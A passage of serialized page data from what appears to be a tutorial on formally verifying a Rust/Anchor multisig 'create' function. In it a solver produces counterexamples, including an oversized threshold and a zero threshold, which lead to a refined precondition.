Account",{"type":25,"tag":216,"props":27042,"children":27043},{"style":6964},[27044],{"type":31,"value":26868},{"type":25,"tag":216,"props":27046,"children":27047},{"style":7375},[27048],{"type":31,"value":26873},{"type":25,"tag":216,"props":27050,"children":27051},{"style":6964},[27052],{"type":31,"value":7026},{"type":25,"tag":216,"props":27054,"children":27055},{"style":7375},[27056],{"type":31,"value":26687},{"type":25,"tag":216,"props":27058,"children":27059},{"style":6964},[27060],{"type":31,"value":10089},{"type":25,"tag":216,"props":27062,"children":27063},{"class":6922,"line":7305},[27064],{"type":25,"tag":216,"props":27065,"children":27066},{"emptyLinePlaceholder":16},[27067],{"type":31,"value":7642},{"type":25,"tag":216,"props":27069,"children":27070},{"class":6922,"line":7557},[27071,27076,27080],{"type":25,"tag":216,"props":27072,"children":27073},{"style":6964},[27074],{"type":31,"value":27075},"    #[account(",{"type":25,"tag":216,"props":27077,"children":27078},{"style":6936},[27079],{"type":31,"value":7691},{"type":25,"tag":216,"props":27081,"children":27082},{"style":6964},[27083],{"type":31,"value":24218},{"type":25,"tag":216,"props":27085,"children":27086},{"class":6922,"line":7574},[27087,27091,27096,27100,27105,27109,27113],{"type":25,"tag":216,"props":27088,"children":27089},{"style":6936},[27090],{"type":31,"value":24803},{"type":25,"tag":216,"props":27092,"children":27093},{"style":6947},[27094],{"type":31,"value":27095}," creator",{"type":25,"tag":216,"props":27097,"children":27098},{"style":6953},[27099],{"type":31,"value":1472},{"type":25,"tag":216,"props":27101,"children":27102},{"style":7375},[27103],{"type":31,"value":27104}," Signer",{"type":25,"tag":216,"props":27106,"children":27107},{"style":6964},[27108],{"type":31,"value":26868},{"type":25,"tag":216,"props":27110,"children":27111},{"style":7375},[27112],{"type":31,"value":26873},{"type":25,"tag":216,"props":27114,"children":27115},{"style":6964},[27116],{"type":31,"value":10089},{"type":25,"tag":216,"props":27118,"children":27119},{"class":6922,"line":7591},[27120,27124,27129,27133,27138,27142,27146,27150,27155],{"type":25,"tag":216,"props":27121,"children":27122},{"style":6936},[27123],{"type":31,"value":24803},{"type":25,"tag":216,"props":27125,"children":27126},{"style":6947},[27127],{"type":31,"value":27128}," system_program",{"type":25,"tag":216,"props":27130,"children":27131},{"style":6953},[27132],{"type":31,"value":1472},{"type":25,"tag":216,"props":27134,"children":27135},{"style":7375},[27136],{"type":31,"value":27137}," Program",{"type":25,"tag":216,"props":27139,"children":27140},{"style":6964},[27141],{"type":31,"value":26868},{"type":25,"tag":216,"props":27143,"children":27144},{"style":7375},[27145],{"type":31,"value":26873},{"type":25,"tag":216,"props":27147,"children":27148},{"style":6964},[27149],{"type":31,"value":7026},{"type":25,"tag":216,"props":27151,"children":27152},{"style":7375},[27153],{"type":31,"value":27154},"System",{"type":25,"tag":216,"props":27156,"children":27157},{"style":6964},[27158],{"type":31,"value":10089},{"type":25,"tag":216,"props":27160,"children":27161},{"class":6922,"line":7604},[27162],{"type":25,"tag":216,"props":27163,"children":27164},{"style":6964},[27165],{"type":31,"value":7874},{"type":25,"tag":216,"props":27167,"children":27168},{"class":6922,"line":7613},[27169],{"type":25,"tag":216,"props":27170,"children":27171},{"emptyLinePlaceholder":16},[27172],{"type":31,"value":7642},{"type":25,"tag":216,"props":27174,"children":27175},{"class":6922,"line":7636},[27176,27180,27184,27188],{"type":25,"tag":216,"props":27177,"children":27178},{"style":6936},[27179],{"type":31,"value":17647},{"type":25,"tag":216,"props":27181,"children":27182},{"style":6936},[27183],{"type":31,"value":17652},{"type":25,"tag":216,"props":27185,"children":27186},{"style":7047},[27187],{"type":31,"value":11064},{"type":25,"tag":216,"props":27189,"children":27190},{"style":6964},[27191],{"type":31,"value":7420},{"type":25,"tag":216,"props":27193,"children":27194},{"class":6922,"line":7645},[27195,27199,27203,27207,27211,27216],{"type":25,"tag":216,"props":27196,"children":27197},{"style":6947},[27198],{"type":31,"value":24183},{"type":25,"tag":216,"props":27200,"children":27201},{"style":6953},[27202],{"type":31,"value":1472},{"type":25,"tag":216,"props":27204,"children":27205},{"style":7375},[27206],{"type":31,"value":24249},{"type":25,"tag":216,"props":27208,"children":27209},{"style":6964},[27210],{"type":31,"value":9757},{"type":25,"tag":216,"props":27212,"children":27213},{"style":7375},[27214],{"type":31,"value":27215},"Create",{"type":25,"tag":216,"props":27217,"children":27218},{"style":6964},[27219],{"type":31,"value":10089},{"type":25,"tag":216,"props":27221,"children":27222},{"class":6922,"line":7654},[27223,27228,27232,27236],{"type":25,"tag":216,"props":27224,"children":27225},{"style":6947},[27226],{"type":31,"value":27227},"    threshold",{"type":25,"tag":216,"props":27229,"children":27230},{"style":6953},[27231],{"type":31,"value":1472},{"type":25,"tag":216,"props":27233,"children":27234},{"style":7375},[27235],{"type":31,"value":24990},{"type":25,"tag":216,"props":27237,"children":27238},{"style":6964},[27239],{"type":31,"value":7465},{"type":25,"tag":216,"props":27241,"children":27242},{"class":6922,"line":7722},[27243,27248,27252,27256],{"type":25,"tag":216,"props":27244,"children":27245},{"style":6947},[27246],{"type":31,"value":27247},"    create_key",{"type":25,"tag":216,"props":27249,"children":27250},{"style":6953},[27251],{"type":31,"value":1472},{"type":25,"tag":216,"props":27253,"children":27254},{"style":7375},[27255],{"type":31,"value":24817},{"type":25,"tag":216,"props":27257,"children":27258},{"style":6964},[27259],{"type":31,"value":7465},{"type":25,"tag":216,"props":27261,"children":27262},{"class":6922,"line":7730},[27263,27268,27272,27276,27280,27284],{"type":25,"tag":216,"props":27264,"children":27265},{"style":6947},[27266],{"type":31,"value":27267},"    members",{"type":25,"tag":216,"props":27269,"children":27270},{"style":6953},[27271],{"type":31,"value":1472},{"type":25,"tag":216,"props":27273,"children":27274},{"style":7375},[27275],{"type":31,"value":25349},{"type":25,"tag":216,"props":27277,"children":27278},{"style":6964},[27279],{"type":31,"value":9757},{"type":25,"tag":216,"props":27281,"children":27282},{"style":7375},[27283],{"type":31,"value":25358},{"type":25,"tag":216,"props":27285,"children":27286},{"style":6964},[27287],{"type":31,"value":10089},{"type":25,"tag":216,"props":27289,"children":27290},{"class":6922,"line":7760},[27291,27295,27299,27303],{"type":25,"tag":216,"props":27292,"children":27293},{"style":6964},[27294],{"type":31,"value":7036},{"type":25,"tag":216,"props":27296,"children":27297},{"style":6953},[27298],{"type":31,"value":17714},{"type":25,"tag":216,"props":27300,"children":27301},{"style":7375},[27302],{"type":31,"value":17719},{"type":25,"tag":216,"props":27304,"children":27305},{"style":6964},[27306],{"type":31,"value":24291},{"type":25,"tag":216,"props":27308,"children":27309},{"class":6922,"line":7768},[27310],{"type":25,"tag":216,"props":27311,"children":27312},{"style":6927},[27313],{"type":31,"value":27314},"    // sort the members and remove duplicates\n",{"type":25,"tag":216,"props":27316,"children":27317},{"class":6922,"line":7800},[27318,27322,27326,27331,27335,27339],{"type":25,"tag":216,"props":27319,"children":27320},{"style":6936},[27321],{"type":31,"value":6939},{"type":25,"tag":216,"props":27323,"children":27324},{"style":6936},[27325],{"type":31,"value":6944},{"type":25,"tag":216,"props":27327,"children":27328},{"style":6947},[27329],{"type":31,"value":27330}," members",{"type":25,"tag":216,"props":27332,"children":27333},{"style":6953},[27334],{"type":31,"value":6956},{"type":25,"tag":216,"props":27336,"children":27337},{"style":6947},[27338],{"type":31,"value":27330},{"type":25,"tag":216,"props":27340,"children":27341},{"style":6964},[27342],{"type":31,"value":6967},{"type":25,"tag":216,"props":27344,"children":27345},{"class":6922,"line":7808},[27346,27350,27354,27359],{"type":25,"tag":216,"props":27347,"children":27348},{"style":6947},[27349],{"type":31,"value":27267},{"type":25,"tag":216,"props":27351,"children":27352},{"style":6953},[27353],{"type":31,"value":179},{"type":25,"tag":216,"props":27355,"children":27356},{"style":7047},[27357],{"type":31,"value":27358},"sort",{"type":25,"tag":216,"props":27360,"children":27361},{"style":6964},[27362],{"type":31,"value":7633},{"type":25,"tag":216,"props":27364,"children":27365},{"class":6922,"line":7868},[27366,27370,27374,27379],{"type":25,"tag":216,"props":27367,"children":27368},{"style":6947},[27369],{"type":31,"value":27267},{"type":25,"tag":216,"props":27371,"children":27372},{"style":6953},[27373],{"type":31,"value":179},{"type":25,"tag":216,"props":27375,"children":27376},{"style":7047},[27377],{"type":31,"value":27378},"dedup",{"type":25,"tag":216,"props":27380,"children":27381},{"style":6964},[27382],{"type":31,"value":7633},{"type":25,"tag":216,"props":27384,"children":27385},{"class":6922,"line":13001},[27386],{"type":25,"tag":216,"props":27387,"children":27388},{"emptyLinePlaceholder":16},[27389],{"type":31,"value":7642},{"type":25,"tag":216,"props":27391,"children":27392},{"class":6922,"line":13019},[27393],{"type":25,"tag":216,"props":27394,"children":27395},{"style":6927},[27396],{"type":31,"value":27397},"    // check we don't exceed u16\n",{"type":25,"tag":216,"props":27399,"children":27400},{"class":6922,"line":13064},[27401,27405,27410,27414,27418,27422,27426],{"type":25,"tag":216,"props":27402,"children":27403},{"style":6936},[27404],{"type":31,"value":6939},{"type":25,"tag":216,"props":27406,"children":27407},{"style":6947},[27408],{"type":31,"value":27409}," total_members",{"type":25,"tag":216,"props":27411,"children":27412},{"style":6953},[27413],{"type":31,"value":6956},{"type":25,"tag":216,"props":27415,"children":27416},{"style":6947},[27417],{"type":31,"value":27330},{"type":25,"tag":216,"props":27419,"children":27420},{"style":6953},[27421],{"type":31,"value":179},{"type":25,"tag":216,"props":27423,"children":27424},{"style":7047},[27425],{"type":31,"value":13094},{"type":25,"tag":216,"props":27427,"children":27428},{"style":6964},[27429],{"type":31,"value":7633},{"type":25,"tag":216,"props":27431,"children":27432},{"class":6922,"line":13170},[27433,27437,27441,27445,27449],{"type":25,"tag":216,"props":27434,"children":27435},{"style":6973},[27436],{"type":31,"value":16235},{"type":25,"tag":216,"props":27438,"children":27439},{"style":6947},[27440],{"type":31,"value":27409},{"type":25,"tag":216,"props":27442,"children":27443},{"style":6953},[27444],{"type":31,"value":12672},{"type":25,"tag":216,"props":27446,"children":27447},{"style":6989},[27448],{"type":31,"value":8471},{"type":25,"tag":216,"props":27450,"children":27451},{"style":6964},[27452],{"type":31,"value":7241},{"type":25,"tag":216,"props":27454,"children":27456},{"class":6922,"line":27455},31,[27457,27461,27466,27470,27475,27479,27484],{"type":25,"tag":216,"props":27458,"children":27459},{"style":6973},[27460],{"type":31,"value":19702},{"type":25,"tag":216,"props":27462,"children":27463},{"style":7047},[27464],{"type":31,"value":27465}," err!",{"type":25,"tag":216,"props":27467,"children":27468},{"style":6964},[27469],{"type":31,"value":1850},{"type":25,"tag":216,"props":27471,"children":27472},{"style":7375},[27473],{"type":31,"value":27474},"MsError",{"type":25,"tag":216,"props":27476,"children":27477},{"style":6953},[27478],{"type":31,"value":7438},{"type":25,"tag":216,"props":27480,"children":27481},{"style":7375},[27482],{"type":31,"value":27483},"EmptyMembers",{"type":25,"tag":216,"props":27485,"children":27486},{"style":6964},[27487],{"type":31,"value":7797},{"type":25,"tag":216,"props":27489,"children":27491},{"class":6922,"line":27490},32,[27492],{"type":25,"tag":216,"props":27493,"children":27494},{"style":6964},[27495],{"type":31,"value":7311},{"type":25,"tag":216,"props":27497,"children":27499},{"class":6922,"line":27498},33,[27500],{"type":25,"tag":216,"props":27501,"children":27502},{"emptyLinePlaceholder":16},[27503],{"type":31,"value":7642},{"type":25,"tag":216,"props":27505,"children":27507},{"class":6922,"line":27506},34,[27508],{"type":25,"tag":216,"props":27509,"children":27510},{"style":6927},[27511],{"type":31,"value":27512},"    // make sure we don't exceed u16 on first call\n",{"type":25,"tag":216,"props":27514,"children":27516},{"class":6922,"line":27515},35,[27517,27521,27525,27529,27533,27537,27541,27546,27550],{"type":25,"tag":216,"props":27518,"children":27519},{"style":6973},[27520],{"type":31,"value":16235},{"type":25,"tag":216,"props":27522,"children":27523},{"style":6947},[27524],{"type":31,"value":27409},{"type":25,"tag":216,"props":27526,"children":27527},{"style":6953},[27528],{"type":31,"value":18151},{"type":25,"tag":216,"props":27530,"children":27531},{"style":7375},[27532],{"type":31,"value":17688},{"type":25,"tag":216,"props":27534,"children":27535},{"style":6953},[27536],{"type":31,"value":7438},{"type":25,"tag":216,"props":27538,"children":27539},{"style":7047},[27540],{"type":31,"value":23433},{"type":25,"tag":216,"props":27542,"children":27543},{"style":6964},[27544],{"type":31,"value":27545},"(u16",{"type":25,"tag":216,"props":27547,"children":27548},{"style":6953},[27549],{"type":31,"value":7438},{"type":25,"tag":216,"props":27551,"children":27552},{"style":6964},[27553],{"type":31,"value":27554},"MAX) {\n",{"type":25,"tag":216,"props":27556,"children":27558},{"class":6922,"line":27557},36,[27559,27563,27567,27571,27575,27579,27584],{"type":25,"tag":216,"props":27560,"children":27561},{"style":6973},[27562],{"type":31,"value":19702},{"type":25,"tag":216,"props":27564,"children":27565},{"style":7047},[27566],{"type":31,"value":27465},{"type":25,"tag":216,"props":27568,"children":27569},{"style":6964},[27570],{"type":31,"value":1850},{"type":25,"tag":216,"props":27572,"children":27573},{"style":7375},[27574],{"type":31,"value":27474},{"type":25,"tag":216,"props":27576,"children":27577},{"style":6953},[27578],{"type":31,"value":7438},{"type":25,"tag":216,"props":27580,"children":27581},{"style":7375},[27582],{"type":31,"value":27583},"MaxMembersReached",{"type":25,"tag":216,"props":27585,"children":27586},{"style":6964},[27587],{"type":31,"value":7797},{"type":25,"tag":216,"props":27589,"children":27591},{"class":6922,"line":27590},37,[27592],{"type":25,"tag":216,"props":27593,"children":27594},{"style":6964},[27595],{"type":31,"value":7311},{"type":25,"tag":216,"props":27597,"children":27599},{"class":6922,"line":27598},38,[27600],{"type":25,"tag":216,"props":27601,"children":27602},{"emptyLinePlaceholder":16},[27603],{"type":31,"value":7642},{"type":25,"tag":216,"props":27605,"children":27607},{"class":6922,"line":27606},39,[27608],{"type":25,"tag":216,"props":27609,"children":27610},{"style":6927},[27611],{"type":31,"value":27612},"    // make sure threshold is valid\n",{"type":25,"tag":216,"props":27614,"children":27616},{"class":6922,"line":27615},40,[27617,27621,27625,27629,27633,27637,27641,27646,27650,27655,27659,27663,27667,27671,27675,27680,27685],{"type":25,"tag":216,"props":27618,"children":27619},{"style":6973},[27620],{"type":31,"value":16235},{"type":25,"tag":216,"props":27622,"children":27623},{"style":7375},[27624],{"type":31,"value":17688},{"type":25,"tag":216,"props":27626,"children":27627},{"style":6953},[27628],{"type":31,"value":7438},{"type":25,"tag":216,"props":27630,"children":27631},{"style":7047},[27632],{"type":31,"value":23433},{"type":25,"tag":216,"props":27634,"children":27635},{"style":6964},[27636],{"type":31,"value":1850},{"type":25,"tag":216,"props":27638,"children":27639},{"style":6947},[27640],{"type":31,"value":26695},{"type":25,"tag":216,"props":27642,"children":27643},{"style":6964},[27644],{"type":31,"value":27645},") \u003C ",{"type":25,"tag":216,"props":27647,"children":27648},{"style":6989},[27649],{"type":31,"value":184},{"type":25,"tag":216,"props":27651,"children":27652},{"style":6953},[27653],{"type":31,"value":27654}," ||",{"type":25,"tag":216,"props":27656,"children":27657},{"style":7375},[27658],{"type":31,"value":17688},{"type":25,"tag":216,"props":27660,"children":27661},{"style":6953},[27662],{"type":31,"value":7438},{"type":25,"tag":216,"props":27664,"children":27665},{"style":7047},[27666],{"type":31,"value":23433},{"type":25,"tag":216,"props":27668,"children":27669},{"style":6964},[27670],{"type":31,"value":1850},{"type":25,"tag":216,"props":27672,"children":27673},{"style":6947},[27674],{"type":31,"value":26695},{"type":25,"tag":216,"props":27676,"children":27677},{"style":6964},[27678],{"type":31,"value":27679},") > ",{"type":25,"tag":216,"props":27681,"children":27682},{"style":6947},[27683],{"type":31,"value":27684},"total_members",{"type":25,"tag":216,"props":27686,"children":27687},{"style":6964},[27688],{"type":31,"value":7241},{"type":25,"tag":216,"props":27690,"children":27692},{"class":6922,"line":27691},41,[27693,27697,27701,27705,27709,27713,27718],{"type":25,"tag":216,"props":27694,"children":27695},{"style":6973},[27696],{"type":31,"value":19702},{"type":25,"tag":216,"props":27698,"children":27699},{"style":7047},[27700],{"type":31,"value":27465},{"type":25,"tag":216,"props":27702,"children":27703},{"style":6964},[27704],{"type":31,"value":1850},{"type":25,"tag":216,"props":27706,"children":27707},{"style":7375},[27708],{"type":31,"value":27474},{"type":25,"tag":216,"props":27710,"children":27711},{"style":6953},[27712],{"type":31,"value":7438},{"type":25,"tag":216,"props":27714,"children":27715},{"style":7375},[27716],{"type":31,"value":27717},"InvalidThreshold",{"type":25,"tag":216,"props":27719,"children":27720},{"style":6964},[27721],{"type":31,"value":7797},{"type":25,"tag":216,"props":27723,"children":27725},{"class":6922,"line":27724},42,[27726],{"type":25,"tag":216,"props":27727,"children":27728},{"style":6964},[27729],{"type":31,"value":7311},{"type":25,"tag":216,"props":27731,"children":27733},{"class":6922,"line":27732},43,[27734],{"type":25,"tag":216,"props":27735,"children":27736},{"emptyLinePlaceholder":16},[27737],{"type":31,"value":7642},{"type":25,"tag":216,"props":27739,"children":27741},{"class":6922,"line":27740},44,[27742,27746,27750,27754,27758,27763,27767,27771],{"type":25,"tag":216,"props":27743,"children":27744},{"style":6947},[27745],{"type":31,"value":24183},{"type":25,"tag":216,"props":27747,"children":27748},{"style":6953},[27749],{"type":31,"value":179},{"type":25,"tag":216,"props":27751,"children":27752},{"style":6964},[27753],{"type":31,"value":18632},{"type":25,"tag":216,"props":27755,"children":27756},{"style":6953},[27757],{"type":31,"value":179},{"type":25,"tag":216,"props":27759,"children":27760},{"style":6964},[27761],{"type":31,"value":27762},"multisig",{"type":25,"tag":216,"props":27764,"children":27765},{"style":6953},[27766],{"type":31,"value":179},{"type":25,"tag":216,"props":27768,"children":27769},{"style":7047},[27770],{"type":31,"value":24700},{"type":25,"tag":216,"props":27772,"children":27773},{"style":6964},[27774],{"type":31,"value":7420},{"type":25,"tag":216,"props":27776,"children":27778},{"class":6922,"line":27777},45,[27779,27784],{"type":25,"tag":216,"props":27780,"children":27781},{"style":6947},[27782],{"type":31,"value":27783},"        threshold",{"type":25,"tag":216,"props":27785,"children":27786},{"style":6964},[27787],{"type":31,"value":7465},{"type":25,"tag":216,"props":27789,"children":27791},{"class":6922,"line":27790},46,[27792,27797],{"type":25,"tag":216,"props":27793,"children":27794},{"style":6947},[27795],{"type":31,"value":27796},"        create_key",{"type":25,"tag":216,"props":27798,"children":27799},{"style":6964},[27800],{"type":31,"value":7465},{"type":25,"tag":216,"props":27802,"children":27804},{"class":6922,"line":27803},47,[27805,27810],{"type":25,"tag":216,"props":27806,"children":27807},{"style":6947},[27808],{"type":31,"value":27809},"        members",{"type":25,"tag":216,"props":27811,"children":27812},{"style":6964},[27813],{"type":31,"value":7465},{"type":25,"tag":216,"props":27815,"children":27817},{"class":6922,"line":27816},48,[27818,27822,27826,27830,27835,27839,27843,27847,27852,27856,27860,27864],{"type":25,"tag":216,"props":27819,"children":27820},{"style":6953},[27821],{"type":31,"value":11703},{"type":25,"tag":216,"props":27823,"children":27824},{"style":6947},[27825],{"type":31,"value":24240},{"type":25,"tag":216,"props":27827,"children":27828},{"style":6953},[27829],{"type":31,"value":179},{"type":25,"tag":216,"props":27831,"children":27832},{"style":6964},[27833],{"type":31,"value":27834},"bumps",{"type":25,"tag":216,"props":27836,"children":27837},{"style":6953},[27838],{"type":31,"value":179},{"type":25,"tag":216,"props":27840,"children":27841},{"style":7047},[27842],{"type":31,"value":20310},{"type":25,"tag":216,"props":27844,"children":27845},{"style":6964},[27846],{"type":31,"value":1850},{"type":25,"tag":216,"props":27848,"children":27849},{"style":8205},[27850],{"type":31,"value":27851},"\"multisig\"",{"type":25,"tag":216,"props":27853,"children":27854},{"style":6964},[27855],{"type":31,"value":1888},{"type":25,"tag":216,"props":27857,"children":27858},{"style":6953},[27859],{"type":31,"value":179},{"type":25,"tag":216,"props":27861,"children":27862},{"style":7047},[27863],{"type":31,"value":7628},{"type":25,"tag":216,"props":27865,"children":27866},{"style":6964},[27867],{"type":31,"value":7448},{"type":25,"tag":216,"props":27869,"children":27871},{"class":6922,"line":27870},49,[27872],{"type":25,"tag":216,"props":27873,"children":27874},{"style":6964},[27875],{"type":31,"value":27876},"    )\n",{"type":25,"tag":216,"props":27878,"children":27880},{"class":6922,"line":27879},50,[27881],{"type":25,"tag":216,"props":27882,"children":27883},{"style":6964},[27884],{"type":31,"value":7874},{"type":25,"tag":38,"props":27886,"children":27887},{},[27888,27890,27895,27897,27902],{"type":31,"value":27889},"We can start by testing an empty ",{"type":25,"tag":82,"props":27891,"children":27893},{"className":27892},[],[27894],{"type":31,"value":24115},{"type":31,"value":27896}," (this will default to ",{"type":25,"tag":82,"props":27898,"children":27900},{"className":27899},[],[27901],{"type":31,"value":230},{"type":31,"value":27903},"):",{"type":25,"tag":206,"props":27905,"children":27907},{"code":27906,"language":6914,"meta":7,"className":6915,"style":7},"#[succeeds_if()]\npub fn create(...) { ... }\n",[27908],{"type":25,"tag":82,"props":27909,"children":27910},{"__ignoreMap":7},[27911,27919],{"type":25,"tag":216,"props":27912,"children":27913},{"class":6922,"line":6923},[27914],{"type":25,"tag":216,"props":27915,"children":27916},{"style":6964},[27917],{"type":31,"value":27918},"#[succeeds_if()]\n",{"type":25,"tag":216,"props":27920,"children":27921},{"class":6922,"line":6769},[27922,27926,27930,27934,27938,27942,27947,27951],{"type":25,"tag":216,"props":27923,"children":27924},{"style":6936},[27925],{"type":31,"value":17647},{"type":25,"tag":216,"props":27927,"children":27928},{"style":6936},[27929],{"type":31,"value":17652},{"type":25,"tag":216,"props":27931,"children":27932},{"style":7047},[27933],{"type":31,"value":11064},{"type":25,"tag":216,"props":27935,"children":27936},{"style":6964},[27937],{"type":31,"value":1850},{"type":25,"tag":216,"props":27939,"children":27940},{"style":6953},[27941],{"type":31,"value":13547},{"type":25,"tag":216,"props":27943,"children":27944},{"style":6964},[27945],{"type":31,"value":27946},") { ",{"type":25,"tag":216,"props":27948,"children":27949},{"style":6953},[27950],{"type":31,"value":13547},{"type":25,"tag":216,"props":27952,"children":27953},{"style":6964},[27954],{"type":31,"value":13552},{"type":25,"tag":38,"props":27956,"children":27957},{},[27958],{"type":31,"value":27959},"Running the solver, we get:",{"type":25,"tag":206,"props":27961,"children":27963},{"code":27962},"...\nVERIFICATION:- FAILED\nVerification Time: 6.404167s\n",[27964],{"type":25,"tag":82,"props":27965,"children":27966},{"__ignoreMap":7},[27967],{"type":31,"value":27962},{"type":25,"tag":38,"props":27969,"children":27970},{},[27971,27973,27978],{"type":31,"value":27972},"This means that ",{"type":25,"tag":82,"props":27974,"children":27976},{"className":27975},[],[27977],{"type":31,"value":230},{"type":31,"value":27979}," does not imply that the function will succeed (which is expected looking at the implementation above).",{"type":25,"tag":38,"props":27981,"children":27982},{},[27983],{"type":31,"value":27984},"We can ask the solver to produce a counterexample:",{"type":25,"tag":206,"props":27986,"children":27988},{"code":27987},"threshold: 33764\ncreate_key: ...\nmembers: SparseVec { size: 19 }\n",[27989],{"type":25,"tag":82,"props":27990,"children":27991},{"__ignoreMap":7},[27992],{"type":31,"value":27987},{"type":25,"tag":38,"props":27994,"children":27995},{},[27996],{"type":31,"value":27997},"In this case, we can see that the threshold is invalid; it should not be larger than the number of members.",{"type":25,"tag":38,"props":27999,"children":28000},{},[28001],{"type":25,"tag":64,"props":28002,"children":28003},{},[28004,28006,28012],{"type":31,"value":28005},"Note also that the verifier decided to use a ",{"type":25,"tag":82,"props":28007,"children":28009},{"className":28008},[],[28010],{"type":31,"value":28011},"SparseVec",{"type":31,"value":28013}," which is one of our custom vec implementations. In this case, the code we are verifying doesn't actually read or write to the vector and so we can model it simply as a symbolic size (with no data).",{"type":25,"tag":38,"props":28015,"children":28016},{},[28017],{"type":25,"tag":64,"props":28018,"children":28019},{},[28020,28022,28027,28028,28034,28036,28041,28043,28048],{"type":31,"value":28021},"Using a sparse vec rather than a concrete vec is generally preferred as it speeds up computation and allows us to model arbitrarily sized vecs. ",{"type":25,"tag":82,"props":28023,"children":28025},{"className":28024},[],[28026],{"type":31,"value":7783},{"type":31,"value":1307},{"type":25,"tag":82,"props":28029,"children":28031},{"className":28030},[],[28032],{"type":31,"value":28033},"pop",{"type":31,"value":28035}," are stubbed out to simply panic for the ",{"type":25,"tag":82,"props":28037,"children":28039},{"className":28038},[],[28040],{"type":31,"value":28011},{"type":31,"value":28042}," and if this code tried to do that we would fall back to the concrete ",{"type":25,"tag":82,"props":28044,"children":28046},{"className":28045},[],[28047],{"type":31,"value":906},{"type":31,"value":28049}," type.",{"type":25,"tag":38,"props":28051,"children":28052},{},[28053],{"type":31,"value":28054},"We can add this to our constraint and try again:",{"type":25,"tag":206,"props":28056,"children":28058},{"code":28057,"language":6914,"meta":7,"className":6915,"style":7},"#[succeeds_if(\n    (threshold as usize) \u003C= members.len()\n)]\npub fn create(...) { ... }\n",[28059],{"type":25,"tag":82,"props":28060,"children":28061},{"__ignoreMap":7},[28062,28070,28107,28114],{"type":25,"tag":216,"props":28063,"children":28064},{"class":6922,"line":6923},[28065],{"type":25,"tag":216,"props":28066,"children":28067},{"style":6964},[28068],{"type":31,"value":28069},"#[succeeds_if(\n",{"type":25,"tag":216,"props":28071,"children":28072},{"class":6922,"line":6769},[28073,28078,28082,28086,28090,28094,28098,28102],{"type":25,"tag":216,"props":28074,"children":28075},{"style":6964},[28076],{"type":31,"value":28077},"    (threshold ",{"type":25,"tag":216,"props":28079,"children":28080},{"style":6936},[28081],{"type":31,"value":12795},{"type":25,"tag":216,"props":28083,"children":28084},{"style":7375},[28085],{"type":31,"value":17688},{"type":25,"tag":216,"props":28087,"children":28088},{"style":6964},[28089],{"type":31,"value":7036},{"type":25,"tag":216,"props":28091,"children":28092},{"style":6953},[28093],{"type":31,"value":23374},{"type":25,"tag":216,"props":28095,"children":28096},{"style":6964},[28097],{"type":31,"value":27330},{"type":25,"tag":216,"props":28099,"children":28100},{"style":6953},[28101],{"type":31,"value":179},{"type":25,"tag":216,"props":28103,"children":28104},{"style":6964},[28105],{"type":31,"value":28106},"len()\n",{"type":25,"tag":216,"props":28108,"children":28109},{"class":6922,"line":6778},[28110],{"type":25,"tag":216,"props":28111,"children":28112},{"style":6964},[28113],{"type":31,"value":24218},{"type":25,"tag":216,"props":28115,"children":28116},{"class":6922,"line":7005},[28117,28121,28125,28129,28133,28137,28141,28145],{"type":25,"tag":216,"props":28118,"children":28119},{"style":6936},[28120],{"type":31,"value":17647},{"type":25,"tag":216,"props":28122,"children":28123},{"style":6936},[28124],{"type":31,"value":17652},{"type":25,"tag":216,"props":28126,"children":28127},{"style":7047},[28128],{"type":31,"value":11064},{"type":25,"tag":216,"props":28130,"children":28131},{"style":6964},[28132],{"type":31,"value":1850},{"type":25,"tag":216,"props":28134,"children":28135},{"style":6953},[28136],{"type":31,"value":13547},{"type":25,"tag":216,"props":28138,"children":28139},{"style":6964},[28140],{"type":31,"value":27946},{"type":25,"tag":216,"props":28142,"children":28143},{"style":6953},[28144],{"type":31,"value":13547},{"type":25,"tag":216,"props":28146,"children":28147},{"style":6964},[28148],{"type":31,"value":13552},{"type":25,"tag":38,"props":28150,"children":28151},{},[28152],{"type":31,"value":28153},"Verification failed again! This time we get a different counterexample:",{"type":25,"tag":206,"props":28155,"children":28157},{"code":28156},"threshold: 0\ncreate_key: ...\nmembers: SparseVec { size: 19 }\n",[28158],{"type":25,"tag":82,"props":28159,"children":28160},{"__ignoreMap":7},[28161],{"type":31,"value":28156},{"type":25,"tag":38,"props":28163,"children":28164},{},[28165],{"type":31,"value":28166},"Aha! The threshold cannot be 0 either... Let's try again:",{"type":25,"tag":206,"props":28168,"children":28170},{"code":28169,"language":6914,"meta":7,"className":6915,"style":7},"#[succeeds_if(\n    (threshold as usize) \u003C= members.len()\n    && threshold != 0\n)]\npub fn create(...) { ... }\n",[28171],{"type":25,"tag":82,"props":28172,"children":28173},{"__ignoreMap":7},[28174,28181,28216,28237,28244],{"type":25,"tag":216,"props":28175,"children":28176},{"class":6922,"line":6923},[28177],{"type":25,"tag":216,"props":28178,"children":28179},{"style":6964},[28180],{"type":31,"value":28069},{"type":25,"tag":216,"props":28182,"children":28183},{"class":6922,"line":6769},[28184,28188,28192,28196,28200,28204,28208,28212],{"type":25,"tag":216,"props":28185,"children":28186},{"style":6964},[28187],{"type":31,"value":28077},{"type":25,"tag":216,"props":28189,"children":28190},{"style":6936},[28191],{"type":31,"value":12795},{"type":25,"tag":216,"props":28193,"children":28194},{"style":7375},[28195],{"type":31,"value":17688},{"type":25,"tag":216,"props":28197,"children":28198},{"style":6964},[28199],{"type":31,"value":7036},{"type":25,"tag":216,"props":28201,"children":28202},{"style":6953},[28203],{"type":31,"value":23374},{"type":25,"tag":216,"props":28205,"children":28206},{"style":6964},[28207],{"type":31,"value":27330},{"type":25,"tag":216,"props":28209,"children":28210},{"style":6953},[28211],{"type":31,"value":179},{"type":25,"tag":216,"props":28213,"children":28214},{"style":6964},[28215],{"type":31,"value":28106},{"type":25,"tag":216,"props":28217,"children":28218},{"class":6922,"line":6778},[28219,28223,28228,28232],{"type":25,"tag":216,"props":28220,"children":28221},{"style":6953},[28222],{"type":31,"value":19579},{"type":25,"tag":216,"props":28224,"children":28225},{"style":6964},[28226],{"type":31,"value":28227}," threshold ",{"type":25,"tag":216,"props":28229,"children":28230},{"style":6953},[28231],{"type":31,"value":19646},{"type":25,"tag":216,"props":28233,"children":28234},{"style":6964},[28235],{"type":31,"value":28236}," 